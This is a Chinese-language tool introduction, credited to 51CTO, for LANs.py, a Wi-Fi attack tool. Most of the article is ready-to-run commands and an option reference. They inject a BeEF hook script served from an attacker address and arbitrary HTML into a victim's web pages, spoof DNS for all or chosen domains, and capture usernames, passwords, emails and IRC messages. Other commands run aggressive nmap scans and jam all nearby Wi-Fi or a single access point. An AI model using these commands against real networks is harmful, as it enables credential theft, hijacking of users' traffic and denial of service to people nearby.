LANs.py:一款可以實現代碼注入,無線滲透和WiFi用戶監控的強大工具
LANs.py功能簡介
1. 自動尋找當前網絡中最為活躍的WLAN用戶,並對其中的一名用戶實施監控,然後向該用戶所訪問的Web頁麵注入任意HTML或JavaScript代碼;
2. 幹擾附近的WiFi網絡,幹擾範圍取決於無線網卡的性能。我們可以通過修改配置來實現幹擾所有人的WiFi信號或僅幹擾某一特定用戶的WiFi信號。但是LANs.py不支持對用戶同時進行WiFi幹擾和監聽。
依賴組件
Linux、python-scapy、python-nfqueue(nfqueue-bindings 0.4-3)、aircrack-ng、python-twisted、BeEF (optional)、nmap、nbtscan、tcpdump。(如果你不知道目標用戶的IP地址,那麼你還需要一塊支持混雜模式的無線網卡)
測試環境為Kali Linux,發動攻擊的設備地址為192.168.0.5,目標設備的IP地址為192.168.0.10。
所有的可選操作項:
Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS][-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-a][-set] [-p] [-na] [-n] [-i INTERFACE] [-r REDIRECTTO][-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP][-s SKIP] [-ch CHANNEL] [-m MAXIMUM] [-no] [-tTIMEINTERVAL] [--packets PACKETS] [--directedonly] [--accesspointACCESSPOINT]
工具使用
目前該工具支持從以下協議收集數據:HTTP、FTP、IMAP、POP3和IRC。LANs.py將會打印出URL地址所返回的資源中前135個字符,並自動忽略結尾是.jpg、.jpeg、.gif、.css、.ico、.js、.svg和.woff的URL地址。除此之外,它還能夠輸出任意協議下傳輸的用戶名/密碼、以及接收或發送的電子郵件和IRC消息。
常用命令:
python LANs.py -u -p
其他常用命令:
python LANs.py -u -p -d -ip 192.168.0.10
-d:查看所有的圖片
-ip:設置目標IP地址
HTML注入:
python LANs.py -bhttps://192.168.0.5:3000/hook.js
向目標用戶所訪問的頁麵中注入一個BeEF鉤子( https://beefproject.com/ ,【 參考教程 】),注入的參數會包裹在<script>標簽中,所以你可以在一個JavaScript文件中的任意位置輸入內容。
python LANs.py -c'<title>Owned.</title>'
向目標用戶所訪問的頁麵中注入任意HTML代碼。工具首先會嚐試在第一個<head>標簽之後注入內容,如果失敗則嚐試在第一個</head>標簽之前注入內容。上麵給出的示例代碼會將頁麵標題(title)修改為’Owned.’。
讀取pcap文件:
python LANs.py -pcap libpcapfilename -ip192.168.0.10
為了成功讀取pcap文件中的內容,你需要使用-ip參數指定目標IP。該功能的一個優點就是用戶無需使用root權限便可執行該腳本。
DNS欺騙:
python LANs.py -a -r 80.87.128.67
-a選項將會對目標發出的每一次DNS請求進行欺騙攻擊,並將用戶請求重定向至-r參數所製定的地址。無論用戶在地址欄中輸入的是什麼地址,他們都將會被重定向到stallman.org(80.87.128.67)。
python LANs.py -dns eff.org
該命令將會對域名eff.org及其子域名進行DNS欺騙。
其他使用:
python LANs.py -v -d -p -n -na -set -a -r80.87.128.67 -c '<title>Owned.</title>' -b https://192.168.0.5:3000/hook.js-ip 192.168.0.10
幹擾所有的WiFi網絡:
python LANs.py --jam
僅幹擾指定接入點:
python Lans.py --jam --accesspoint01:MA:C0:AD:DY
所有的可用選項
常規使用:
-b BEEF_HOOK_URL:將BeEF hookURL注入到目標用戶所訪問的每一個頁麵中,例如-b https://192.168.1.10:3000/hook.js 。
-c ‘HTML CODE’:向目標用戶訪問的頁麵中注入任意HTML代碼。
-d:查看目標用戶訪問的圖片。
-dns DOMAIN:對指定DNS域名進行DNS欺騙攻擊,例如-dnsfacebook.com。
-a:對用戶的所有DNS請求進行DNS欺騙攻擊。
-r IPADDRESS: 僅用於-dnsDOMAIN選項。
-u:打印出目標用戶所使用的URL地址。
-i INTERFACE: 指定接口,例如-i wlan0。
-ip:指定目標IP地址。
-n: 對目標執行nmap掃描。
-na:在後台對目標執行更具攻擊性的nmap掃描,並將掃描結果輸出到[victim IP address].nmap.txt。
-p:打印出FTP/IMAP/POP/IRC/HTTP協議下傳輸的用戶名/密碼、以及接收或發送的電子郵件和IRC消息。
-pcap PCAP_FILE: 解析pcap文件中所有的數據包; 需要輸入-ip[target's IP address]參數。
-rmac ROUTER_MAC:指定路由器的MAC地址。
-rip ROUTER_IP:指定路由器的IP地址。
–jam:對2.4GHz無線接入點以及客戶端進行幹擾攻擊。
WiFi幹擾:
-sMAC_Address_to_skip:指定需跳過的MAC地址。
-m MAXIMUM: 指定攻擊客戶端的最大數量。
-t TIME_INTERVAL: 設置攻擊間隔。
–packets NUMBER:指定每一次攻擊中發送的數據包數量。
–accesspoint ROUTER_MAC:輸入目標AP的MAC地址。
本文作者:佚名
來源:51CTO
最後更新:2017-11-02 15:04:27